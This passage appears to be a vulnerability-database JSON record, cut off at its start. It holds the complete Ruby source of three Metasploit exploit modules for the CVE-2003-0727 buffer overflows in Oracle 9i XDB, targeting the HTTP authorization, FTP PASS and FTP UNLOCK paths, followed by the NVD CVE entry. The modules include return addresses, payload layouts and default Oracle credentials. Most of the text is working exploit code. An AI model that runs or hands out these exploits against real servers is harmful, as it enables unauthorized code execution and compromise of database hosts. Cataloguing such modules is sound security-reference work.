"LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0727"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/HTTP/ORACLE9I_XDB_PASS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle 9i XDB HTTP PASS Overflow (win32)',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the authorization\n code of the Oracle 9i HTTP XDB service. David Litchfield,\n has illustrated multiple vulnerabilities in the Oracle\n 9i XML Database (XDB), during a seminar on \"Variations\n in exploit methods between Linux and Windows\" presented\n at the Blackhat conference.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2003-0727'],\n ['OSVDB', '2449'],\n ['BID', '8375'],\n ['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\",\n 'PrependEncoder' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Oracle 9.2.0.1 Universal', { 'Ret' => 0x60616d46 } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Aug 18 2003'))\n\n register_options(\n [\n Opt::RPORT(8080)\n ])\n end\n\n def check\n connect\n sock.put(\"GET / HTTP/1.0\\r\\n\\r\\n\")\n resp = sock.get_once\n disconnect\n\n if (resp =~ /9\\.2\\.0\\.1\\.0/)\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect\n\n sploit = rand_text_english(4, payload_badchars) + \":\"\n sploit << rand_text_english(442, payload_badchars)\n sploit << \"\\xeb\\x64\" + make_nops(2) + [target.ret].pack('V')\n sploit << make_nops(266) + \"\\xeb\\x10\" + make_nops(109) + payload.encoded\n\n req = \"Authorization: Basic #{Rex::Text.encode_base64(sploit)}\\r\\n\\r\\n\"\n\n res = \"GET / HTTP/1.1\\r\\n\" + \"Host: #{rhost}:#{rport}\\r\\n\" + req\n\n print_status(\"Trying target %s...\" % target.name)\n\n sock.put(res)\n\n handler\n disconnect\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/oracle9i_xdb_pass.rb", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-05-23T04:09:32", "description": "By passing an overly long string to the PASS command, a stack based buffer overflow occurs. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on \"Variations in exploit methods between Linux and Windows\" presented at the Blackhat conference.\n", "edition": 2, "cvss3": {}, "published": "2005-11-25T04:11:22", "type": "metasploit", "title": "Oracle 9i XDB FTP PASS Overflow (win32)", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0727"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/FTP/ORACLE9I_XDB_FTP_PASS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Ftp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle 9i XDB FTP PASS Overflow (win32)',\n 'Description' => %q{\n By passing an overly long string to the PASS command, a\n stack based buffer overflow occurs. David Litchfield, has\n illustrated multiple vulnerabilities in the Oracle 9i XML\n Database (XDB), during a seminar on \"Variations in exploit\n methods between Linux and Windows\" presented at the Blackhat\n conference.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2003-0727'],\n [ 'OSVDB', '2449'],\n [ 'BID', '8375'],\n [ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x22\\x25\\x26\\x27\\x2b\\x2f\\x3a\\x3c\\x3e\\x3f\\x40\",\n 'PrependEncoder' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\n },\n 'Platform' => %w{ win },\n 'Targets' =>\n [\n [\n 'Oracle 9.2.0.1 Universal',\n {\n 'Platform' => 'win',\n 'Ret' => 0x60616d46, # oraclient9.dll (pop/pop/ret)\n },\n ],\n ],\n 'DisclosureDate' => 'Aug 18 2003',\n 'DefaultTarget' => 0))\n\n register_options([Opt::RPORT(2100),])\n deregister_options('FTPUSER', 'FTPPASS')\n end\n\n\n def check\n connect\n disconnect\n if (banner =~ /9\\.2\\.0\\.1\\.0/)\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect\n\n user = rand_text_alpha_upper(10)\n sploit = rand_text_alpha_upper(442) + Rex::Arch::X86.jmp_short(6)\n sploit << make_nops(2) + [target.ret].pack('V') + payload.encoded\n\n print_status(\"Trying target #{target.name}...\")\n\n send_cmd( ['USER', user], true )\n send_cmd( ['PASS', sploit], false )\n\n handler\n disconnect\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-08-18T01:13:18", "description": "By passing an overly long token to the UNLOCK command, a stack based buffer overflow occurs. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on \"Variations in exploit methods between Linux and Windows\" presented at the Blackhat conference. Oracle9i includes a number of default accounts, including dbsnmp:dbsmp, scott:tiger, system:manager, and sys:change_on_install.\n", "edition": 2, "cvss3": {}, "published": "2006-01-08T14:27:59", "type": "metasploit", "title": "Oracle 9i XDB FTP UNLOCK Overflow (win32)", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0727"], "modified": "2018-08-20T21:05:58", "id": "MSF:EXPLOIT/WINDOWS/FTP/ORACLE9I_XDB_FTP_UNLOCK", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Ftp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle 9i XDB FTP UNLOCK Overflow (win32)',\n 'Description' => %q{\n By passing an overly long token to the UNLOCK command, a\n stack based buffer overflow occurs. David Litchfield, has\n illustrated multiple vulnerabilities in the Oracle 9i XML\n Database (XDB), during a seminar on \"Variations in exploit\n methods between Linux and Windows\" presented at the Blackhat\n conference. Oracle9i includes a number of default accounts,\n including dbsnmp:dbsmp, scott:tiger, system:manager, and\n sys:change_on_install.\n },\n 'Author' => [ 'MC', 'David Litchfield <david[at]ngssoftware.com>' ],\n 'License' => MSF_LICENSE,\n 'Platform' => [ 'win' ],\n 'References' =>\n [\n [ 'CVE', '2003-0727'],\n [ 'OSVDB', '2449'],\n [ 'BID', '8375'],\n [ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x20\\x0a\\x0d\",\n 'StackAdjustment' => -3500,\n },\n 'Targets' =>\n [\n [\n 'Oracle 9.2.0.1 Universal',\n {\n 'Ret' => 0x60616d46, # oraclient9.dll (pop/pop/ret)\n },\n ],\n ],\n 'DisclosureDate' => 'Aug 18 2003',\n 'DefaultTarget' => 0))\n\n register_options([\n Opt::RPORT(2100),\n OptString.new('FTPUSER', [ true, 'The username to authenticate as', 'DBSNMP']),\n OptString.new('FTPPASS', [ true, 'The password to authenticate with', 'DBSNMP']),\n ])\n end\n\n def check\n connect\n disconnect\n if (banner =~ /9\\.2\\.0\\.1\\.0/)\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n c = connect_login\n return if not c\n\n print_status(\"Trying target #{target.name}...\")\n\n buf = rand_text_english(1130, payload_badchars)\n seh = generate_seh_payload(target.ret)\n buf[322, seh.length] = seh\n\n send_cmd( ['UNLOCK', '/', buf] , false )\n\n handler\n disconnect\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "cve": [{"lastseen": "2022-03-23T11:43:52", "description": "Multiple buffer overflows in the XML Database (XDB) functionality for Oracle 9i Database Release 2 allow local users to cause a denial of service or hijack user sessions.", "cvss3": {}, "published": "2003-10-20T04:00:00", "type": "cve", "title": "CVE-2003-0727", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0727"], "modified": "2017-09-28T01:29:00", "cpe": ["cpe:/a:oracle:database_server:*"], "id": "CVE-2003-0727", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0727", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:database_server:*:*:*:*:*:*:*:*"]}]}